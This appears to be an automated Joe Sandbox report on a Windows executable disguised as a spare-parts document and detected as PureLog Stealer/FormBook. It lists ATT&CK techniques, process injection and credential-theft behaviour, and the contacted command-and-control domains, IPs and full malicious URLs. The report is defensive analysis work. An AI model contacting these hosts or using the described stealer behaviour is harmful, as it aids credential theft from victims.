                      Source: Yara matchFile source: 00000006.00000002.2603358231.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1939504326.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.401e790.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.401e790.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1391242614.0000000007480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1389196693.0000000004001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		412
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		1
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol11
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                      Process Injection                      		NTDS2
                      File and Directory Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information                      		LSA Secrets113
                      System Information Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Timestomp                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562208 Sample: XFO-E2024-013 SMP-10.3-F01-... Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 33 www.070001325.xyz 2->33 35 www.expancz.top 2->35 37 3 other IPs or domains 2->37 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus detection for URL or domain 2->47 49 Yara detected PureLog Stealer 2->49 53 6 other signatures 2->53 10 XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 31 XFO-E2024-013 SMP-...spare parts.exe.log, ASCII 10->31 dropped 67 Injects a PE file into a foreign processes 10->67 14 XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe 10->14         started        17 XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe 10->17         started        signatures6 process7 signatures8 69 Maps a DLL or memory area into another process 14->69 19 xAbOwtcTtZmjBX.exe 14->19 injected process9 signatures10 55 Found direct / indirect Syscall (likely to bypass EDR) 19->55 22 tzutil.exe 13 19->22         started        process11 signatures12 57 Tries to steal Mail credentials (via file / registry access) 22->57 59 Tries to harvest and steal browser information (history, passwords, etc) 22->59 61 Modifies the context of a thread in another process (thread injection) 22->61 63 3 other signatures 22->63 25 xAbOwtcTtZmjBX.exe 22->25 injected 29 firefox.exe 22->29         started        process13 dnsIp14 39 www.expancz.top 107.155.56.30, 49913, 49921, 49927 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK United States 25->39 41 www.070001325.xyz 161.97.142.144, 49874, 80 CONTABODE United States 25->41 43 dns.ladipage.com 13.228.81.39, 49953, 49959, 49966 AMAZON-02US United States 25->43 65 Found direct / indirect Syscall (likely to bypass EDR) 25->65 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==100%Avira URL Cloudmalware
                      http://www.taxiquynhonnew.click/y49d/100%Avira URL Cloudmalware
                      https://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXg100%Avira URL Cloudmalware
                      https://l3filejson4dvd.josyliving.com/favicon.ico0%Avira URL Cloudsafe
                      https://login.70%Avira URL Cloudsafe
                      http://www.taxiquynhonnew.click0%Avira URL Cloudsafe
                      http://www.070001325.xyz/gebt/?Ap=KZH8jfU0&BzI0pR=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==0%Avira URL Cloudsafe
                      https://dq0ib5xlct7tw.cloudfront.net/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.expancz.top
                      		107.155.56.30
                      		truetrue
                        		unknown
                        dns.ladipage.com
                        		13.228.81.39
                        		truefalse
                          		high
                          s-part-0035.t-0009.t-msedge.net
                          		13.107.246.63
                          		truefalse
                            		high
                            www.070001325.xyz
                            		161.97.142.144
                            		truetrue
                              		unknown
                              www.epitomize.shop
                              		unknown
                              		unknownfalse
                                		unknown
                                www.taxiquynhonnew.click
                                		unknown
                                		unknownfalse
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.070001325.xyz/gebt/?Ap=KZH8jfU0&BzI0pR=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==true
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.taxiquynhonnew.click/y49d/true
                                  • Avira URL Cloud: malware
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://ac.ecosia.org/autocomplete?q=tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabtzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://l3filejson4dvd.josyliving.com/favicon.icotzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://duckduckgo.com/ac/?q=tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icotzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://login.7tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://connect.facebook.net/en_US/fbevents.jstzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                            		high
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/DataSet1.xsdXFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exefalse
                                                		high
                                                https://s.yimg.com/wi/ytc.jstzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://analytics.tiktok.com/i18n/pixel/events.jstzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://dq0ib5xlct7tw.cloudfront.net/xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.ecosia.org/newtab/tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.taxiquynhonnew.clickxAbOwtcTtZmjBX.exe, 0000000A.00000002.2602984671.00000000010B6000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgtzutil.exe, 00000009.00000002.2605003324.0000000004098000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.0000000003548000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            161.97.142.144
                                                            		www.070001325.xyzUnited States
                                                            		51167CONTABODEtrue
                                                            13.228.81.39
                                                            		dns.ladipage.comUnited States
                                                            		16509AMAZON-02USfalse
                                                            107.155.56.30
                                                            		www.expancz.topUnited States
                                                            		135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKtrue

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1562208
                                                            Start date and time:2024-11-25 10:49:06 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 29s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:12
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@9/2@6/3
                                                            EGA Information:
                                                            • Successful, ratio: 75%
                                                            HCA Information:
                                                            • Successful, ratio: 90%
                                                            • Number of executed functions: 94
                                                            • Number of non-executed functions: 283
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • VT rate limit hit for: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            04:49:58API Interceptor1x Sleep call for process: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe modified
                                                            04:51:34API Interceptor117x Sleep call for process: tzutil.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            161.97.142.144IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.030002613.xyz/xd9h/
                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • www.070002018.xyz/6m2n/
                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                            • www.54248711.xyz/jm2l/
                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                            • www.54248711.xyz/jm2l/
                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                            • www.54248711.xyz/jm2l/
                                                            Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.070002018.xyz/zffa/
                                                            DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                            • www.030003794.xyz/mpp6/
                                                            PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                            • www.030002350.xyz/wrcq/
                                                            Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                            • www.030003452.xyz/7nfi/
                                                            AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                            • www.030002059.xyz/er88/
                                                            13.228.81.39New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                            • www.masteriocp.online/wg84/
                                                            Shipping report#Cargo Handling.exeGet hashmaliciousFormBookBrowse
                                                            • www.masteriocp.online/p5rq/
                                                            PO76389.exeGet hashmaliciousFormBookBrowse
                                                            • www.masteriocp.online/p5rq/
                                                            r3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                                                            • www.masteriocp.online/p5rq/
                                                            SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                                            • www.tmstore.click/xme5/?RD4=n0CKpMQN4gGZ92M5/3EtOcSUkm26Kn20yY4QJn1V5vv9XAZ2vYFLUkiK71x3Mm43WM97SNcNOsfAT2BrwuTBRE9eXvmWucLueMGlkNS8dNMHocOVM3LStbA=&VzA=dz5HvTSP4ZdlFHDP
                                                            z11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                                                            • www.masteriocp.online/p5rq/
                                                            REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.masteriocp.online/wg84/
                                                            Proforma_Invoice.pif.exeGet hashmaliciousFormBookBrowse
                                                            • www.againbeautywhiteskin.asia/3h10/
                                                            Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                            • www.againbeautywhiteskin.asia/3h10/
                                                            Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                                            • www.againbeautywhiteskin.asia/3h10/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            dns.ladipage.comSwift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                            • 54.179.173.60
                                                            COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 54.179.173.60
                                                            7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                            • 54.179.173.60
                                                            Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                            • 54.179.173.60
                                                            2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                                            • 54.179.173.60
                                                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                            • 54.179.173.60
                                                            PO098765678.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            www.expancz.topSwift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 107.155.56.30
                                                            s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                            • 13.107.246.63
                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                            • 13.107.246.63
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 13.107.246.63
                                                            05.Unzipped.obfhotel22-11.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 13.107.246.63
                                                            Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 13.107.246.63
                                                            fusioncharts.charts.jsGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.63
                                                            0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 13.107.246.63
                                                            1234.exeGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.63
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.63
                                                            somes.exeGet hashmaliciousRedLineBrowse
                                                            • 13.107.246.63
                                                            www.070001325.xyzSwift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            AMAZON-02US05.Unzipped.obfhotel22-11.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 185.166.143.48
                                                            0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                            • 185.166.143.48
                                                            55876.exeGet hashmaliciousUnknownBrowse
                                                            • 18.167.130.152
                                                            55876.exeGet hashmaliciousUnknownBrowse
                                                            • 18.167.130.152
                                                            pXdN91.armv5l.elfGet hashmaliciousMirai, GafgytBrowse
                                                            • 54.171.230.55
                                                            pXdN91.mips.elfGet hashmaliciousMirai, GafgytBrowse
                                                            • 54.171.230.55
                                                            file (1).txt.batGet hashmaliciousUnknownBrowse
                                                            • 18.181.154.24
                                                            startup.txt.batGet hashmaliciousUnknownBrowse
                                                            • 18.181.154.24
                                                            run.txt.batGet hashmaliciousUnknownBrowse
                                                            • 18.181.154.24
                                                            9758xBqgE1azKnB.exeGet hashmaliciousXWormBrowse
                                                            • 18.181.154.24
                                                            UHGL-AS-APUCloudHKHoldingsGroupLimitedHKSwift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 107.155.56.30
                                                            SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                            • 152.32.197.201
                                                            SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                            • 152.32.197.201
                                                            https://rwy.xpbf130.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.ftft155.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.xfor965.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.pkgu192.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.jduv311.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://cmn.gvhu330.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            http://frt.asan192.vip/Get hashmaliciousUnknownBrowse
                                                            • 101.36.121.234
                                                            CONTABODEIETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 161.97.142.144
                                                            purchase Order.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.168.245
                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.168.245
                                                            need quotations.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.168.245
                                                            Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                            • 144.91.79.54
                                                            Swift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Temp\UQ63g7r-

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\tzutil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1221538113908904
                                                            Encrypted:false
                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                            MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                            SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                            SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                            SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.935029022253541
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                                                            File size:765'952 bytes
                                                            MD5:77f595058c6627bf075a7283b57e1c5d
                                                            SHA1:2d62714bf2c62d2f09b13515b4e2aa7735477321
                                                            SHA256:8ba1a789e4494fdc1f919352cb4d80f26ea73c3dd94f978c32cde476afceb34a
                                                            SHA512:f2b943559b78b4f9918179f5e56b3ffb9cc9e4207ac87e05b088fb53df4479c82bc01720d9b2212644bb8f0427fc0d9de45ad696e9944a5162644dfe6ec6cc73
